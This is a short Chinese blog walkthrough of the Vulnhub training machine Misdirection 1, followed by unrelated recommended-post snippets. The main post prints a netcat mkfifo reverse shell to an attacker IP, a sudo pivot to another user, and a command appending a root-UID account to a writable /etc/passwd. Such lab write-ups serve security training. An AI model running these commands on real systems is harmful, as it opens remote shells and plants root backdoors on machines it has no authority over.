Vulnhub:Misdirection 1靶机

已于 2023-06-07 23:30:33 修改
阅读量151 收藏
点赞数
文章标签: 安全 web安全 网络安全
于 2023-04-17 20:26:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130208350
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

8080端口/debug目录,是一个可以执行命令的shell

获得反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.111.111 4444 >/tmp/f

提权

www-data用户sudo权限

提权方法:bash | GTFOBins

切换到brexit用户

sudo -u brexit /bin/bash

/etc/passwd可写

写入用户到/etc/passwd

openssl passwd -1 -salt a a
echo 'a:$1$a$44cUw6Nm5bX0muHWNIwub0:0:0::/root:/bin/bash' >> /etc/passwd

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机MISDIRECTION_ 1
LainWith的博客
01-06 965
系列:Misdirection(此系列共1台) 发布日期:2019 年 9 月 24 日 难度:初级 运行环境:官方推荐Virtualbox,我使用的是VMware 补充:靶机容易被干崩,下手轻点 目标:取得 root 权限 学习:靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/netdiscover主机发现 主机信息探测 nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报 80端口常规探测没有发现什么有趣的信息,但是nmap发现了8
vulnhub靶机Misdirection
0of_blog
05-01 744
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Vulnhub-靶机-Misdirection 1
qq_43264813的博客
01-27 586
Vulnhub靶机Misdirection 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/symfonos-52,415/ 文章目录Vulnhub靶机Misdirection 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3024
每台都做一做,然后记录在博客里.供自己和大家一起学习.
[VulnHub靶机渗透] Misdirection: 1
人若无名,便可专心练剑
02-10 908
靶机精讲之Misdirectionvulnhub靶机,不难,但开始阶段很容易被误导,渗透目标选择的优先级容易选错以致费时,死磕一点还是快速跳跃,需要权衡、经验和智慧。用webshell获得系统立足点,两次提权获得root权限。这台机器很标准,其中多了一点点曲折和趣味,是高仿真场景的抽象,规模不大,但渗透体验很棒,细节满满。
红队打靶:Misdirection打靶思路详解(vulnhub
Bossfrank的博客
10-23 607
本文是vulnhub靶机Misdirection的详细打靶过程。靶机不难,关键点在于找到合适的突破口,不要在看似繁多的攻击面中徘徊。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等。
脱壳的艺术 加解密必备参考书的中文翻译版 CHM格式
11-24
5.1 Misdirection and Stopping Execution via Exceptions 20 5.2 Blocking Input 21 5.3 ThreadHideFromDebugger 22 5.4 Disabling Breakpoints 22 5.5 Unhandled Exception Filter 23 5.6 OllyDbg:...
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 204
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 941
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 609
安全漏洞扫描工具
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1240
Windows安全基线检查标准,Windows加固方式
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 867
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 692
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 507
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):
Linux网络安全
十一、的博客
06-09 785
由于Linux系统的安全稳定,所以经常被用作网络应用服务器。但由于程序代码缺陷的难以避免,这些安装在Linux系统上的网络程序往往会存在着各种漏洞,而入侵者则是利用这些漏洞进行网络攻击,进入系统窃取数据、破坏系统或使系统无法提供正常服务等。Ping是基于ICMP协议的一个实用程序,用于验证两台计算机之间网络连接的可达性和质量。它通过发送ICMP回声请求消息到目标主机,并等待回声应答消息来判断网络状态。当执行ping命令时,它会生成一个ICMP回声请求数据包并发送到指定的目标主机。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 985
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
采用PHP语言(医院安全不良事件上报系统源码)医院不良事件 各类事件分析、分类、处理流程
爱笑的源码博客
06-11 1007
分为外部报告系统和内部报告系统两类。内部报告系统主要以个人为报告单位,由医院护理主管部门自行管理的报告系统。外部报告系统主要以医院护理主管部门为报告单位,由卫生行政部门或行业组织管理的报告系统。
安全等保评测-什么是“等保“?
2401_84434570的博客
06-11 589
它旨在通过对信息和信息系统的安全性进行评估,发现并纠正存在的安全漏洞和隐患,提高信息系统的安全性和可靠性,保障信息的安全。等级保护测评是经公安部认证的具有资质的测评机构,依据国家信息安全等级保护规范规定,受有关单位委托,按照有关管理规范和技术标准,对信息系统安全等级保护状况进行检测评估的活动。进行现场调研和检测:对系统和数据进行现场调研和检测,了解系统和数据的安全状况和存在的问题。确定测评目标和范围:明确要测评的信息和信息系统的范围和目标,了解业务需求和安全需求。
mockito覆盖率
09-03
Mockito本身并不是用来测量代码覆盖率的工具,它是一个用于编写和管理模拟测试的框架,可以帮助我们创建和操作模拟对象,从而简化与依赖项的交互。引用中提到,Mockito可以让我们使用干净简单的API编写漂亮的测试,并且生成干净的验证错误。Mockito的目的是帮助开发人员编写高质量的单元测试,从而提高代码的质量和可维护性。 要测量代码覆盖率,您可以使用其他工具,例如JaCoCo或Cobertura。这些工具可以分析您的测试运行期间所触及的代码行数,并生成相应的报告,以显示代码的覆盖率情况。通常,理想的代码覆盖率目标是70%到80%。超过这个阈值后,进一步增加覆盖率的收益会递减。 因此,Mockito本身并不能提供关于代码覆盖率的信息,但它可以帮助您编写更好的测试代码,以便使用其他工具来测量代码覆盖率。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [如何使用 Mockito 和 Espresso 提高 Android 应用程序的测试覆盖率](https://blog.csdn.net/Misdirection_XG/article/details/126086134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [springTest-mockito-junit](https://download.csdn.net/download/weixin_42129005/18823150)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值